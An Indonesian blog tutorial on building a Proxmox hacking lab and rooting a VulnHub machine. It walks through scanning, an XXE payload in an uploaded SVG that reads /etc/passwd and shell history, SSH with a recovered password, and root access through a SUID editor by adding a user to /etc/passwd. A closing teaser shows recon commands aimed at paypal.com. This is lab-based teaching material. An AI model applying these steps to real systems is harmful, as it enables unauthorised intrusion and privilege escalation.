Membuat Hacking Lab Sendiri di Proxmox (CTF Bug Bounty)

3 min read

kedengaranya sangat menarik bukan, kita membuat lingkungan sendiri seperti layaknya taman bermain, ya bermain dengan “hacking”. ide ini muncul ketika saya mencoba mengaplikasin di salah satu channel youtube write up ctf, tapi saya coba aplikasikan machine di Proxmox VE. untuk menentukan target kalian bisa cari di salah satu web favorit saya waitu www.vulnhub.com, disana kalian dapet mencari machine yang memang di desain untuk dicari kelemahanya, dari level beginner sampai hard. dan juga jika kalian stuck dan memang tidak bisa melakukan apa-apa serta bingung harus memulai dari mana, toh banyak sekali write up yang menulis di blog luar, simplenya kalian bisa cari di medium.com

oke langsung saja kita setup taman bermain ini

dari topologi diatas sudah jelas bahwa jalur internet yang kita request melalui mikrotik router, gunanya gambaran topologi diatas adalah bagaimana kita mencari ip pada machine target, sangat tidak mungkin kita scan manual menggunakan nmap untuk mendapatkan ip mana target yang kita pasang di machine proxmox, cukup lihat mac addressnya lalu cari di Winbox mikrotik

Persiapan Pentest Lab (Attacker)

OS : ubuntu 18.04

Type: LXC Container

Memory : 512 MB

Install Katoolin

Katoolin adalah sebuat tools sederhana yang memudahkan kita untuk menginstall aplikasi pentesting (Kali Linux) ke dalam ubuntu. caranya cukup mudah, langsung saja buka terminal

apt update
apt upgrade
apt install gnupg gnupg2 gnupg1 vim wget curl net-tools git
apt-cache policy python
apt install python
git clone https://github.com/LionSec/katoolin.git
cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin

jalankan katoolin

katoolin

list aplikasi yang biasa saya pakai: nmap, sqlmap, wpscan, dirb, dirbuster

dan kalian bisa menambahkan tools sendiri sesuai dengan kebutuhan

server pentest sudah jadi saatnya kita tinggal setup machine targets

Tentukan Target

target yang akan saya pilih adalah https://www.vulnhub.com/entry/sahu-1,421/ ekstrak file sahu.ova

mkdir sahu
tar xvf sahu.ova -C sahu

kita akan mencoba membuat machine target pertama, Wintermute-Straylight.ova , tutorial untuk import file OVA ke dalam mechine sudah saya tulis di artikel sebelumnya: https://blog.sandysend.com/2020/03/08/cara-import-ova-virtualbox-ke-dalam-proxmox/

jika sudah terbuat kita lihat konfigurasi networknya

berhubung jaringan saya menggunakan mikrotik mari kita cari tahu dengan bermodal informasi mac address kita akan tahu dapet berapa ip lokalnya

masuk ke mikrotik, IP > Hotspot > Host

lalu search mac address disana, maka akan menemukan ip machine target, untuk akses internet keluar saya disallow, karena target tidak perlu akses internet juga, dan untuk jaga-jaga machine target ini ada backdoor keluar, siapa tahu, no body knows kita cari aman saja

setelah ketemu ip addressnya kalian bisa simpan di note atau file tertentu, misalkan file target, jika sudah langsung deh kita coba-coba scan, exploitasi dan menemukan code flagnya (gain root access)

Exploitasi Target

langkah pertama adalah kita melakukan information gathering, tools yang saya gunakan adalah menggunakan Nmap

root@pentest:~# nmap -sV -sC 192.168.11.214

disini dapet diketahui apa saja port yang dibuka, kita coba akses port 3306 yang terindikasi merupakah port mysql

root@pentest:~# curl http://192.168.11.214:3306 -v

dari situ saya tidak menemukan informasi berarti , selanjutnya saya mencoba membruteforce direktori tersebut menggunakan dirb

root@pentest:~# dirb http://192.168.11.214:3306 -X .html

hasilnya saya menemukan file uploader

root@pentest:~# curl http://192.168.11.214:3306/upload.html -v

hemmm, ternyata uploader diatas hanya support menggunakan ekstensi svg

oke sampai disini informasinya cukup saatnya coba kita cari exploit menggunakan svg injection, salah satunya dengan methode LFI

salah satu artikel menyebutkan bahwa kita dapat melakukan LFI dengan sedikit modifikasi script

 ]>&xxe;

lalu simpan code diatas menggunakan format extensi .svg

buka http://192.168.11.214:3306/upload.html

setelah klik upload maka akan muncul gambar seperti berikut

untuk melihat full isi klik kanan “view page source”

bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
employee:x:1000:1000:Linux User,,,:/home/employee:/bin/ash

yang saya mark huruf tebal dari keterangan diatas tercantum terdapat user yang bash shell Environtmen menggunakan “ash”, dan tentunya letak segala history command berada di ~/.ash_history

kita edit file cvg sehingga menjadi seperti

 ]>&xxe;

saya coba upload lagi dan booommm

terlihat password plaintext “superutrapass3”, oke kita coba login ssh menggunakan password tersebut dengan user employee

root@pentest:~# ssh [email protected]

saya coba enumerate semua binnari yang memiliki permission SUID

minuv2:~$ find / -perm -u=s -type f 2>/dev/null

keterangan:

Privilage Escalation

macro editor semacam text editor berbasis terminal dimana kita dapat merubah atau menambahkan user dengan root privilages

minuv2:~$ cat /etc/passwd | /usr/bin/micro

saya coba membuat password untuk user baru dengan menggunakan openssl tool

root@pentest:~# openssl passwd -1 -salt noob noob123

lalu kita tambahkan ke dalam editor micro tadi pada baris paling bawah sehingga menjadi

minuv2:~$ su noob
minuv2:/home/employee# id
minuv2:/home/employee# cd /root/
minuv2:/home/employee# ls
minuv2:/home/employee# cat flag.txt

akhirnya machin target bisa kita root

sekian tutorial kali ini

Who Am I: “Bug Bounty Tips”

berikut ini tips tools melakukan research bug bounty chaos -d http://paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c ‘gospider -a -s “@”...
admin
3 min read

Leave a Reply

Your email address will not be published. Required fields are marked *